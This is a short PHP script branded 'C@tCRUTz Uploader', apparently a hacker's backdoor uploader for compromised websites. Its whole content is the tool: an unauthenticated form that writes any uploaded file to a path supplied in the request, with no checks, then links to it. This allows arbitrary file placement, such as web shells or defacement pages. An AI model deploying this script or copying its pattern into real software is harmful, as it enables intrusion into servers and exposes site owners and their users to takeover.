<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>Check Hasil disini!</a></h1>";
    }
}echo '

<html>
   <head>
   <title>[$] C@tCRUTz Uploader [$]</title>
 </head>
 <center>
 <h1>C@tCRUTz UPLOADER</h1>
 <body>
   <form method=POST enctype="multipart/form-data" action="">
   <input type=text name=path>
  <br>
  <br>
   <input type="file" name="files">
   <input type=submit value="Gass!">
   </form>
 </body>
</html>';
?>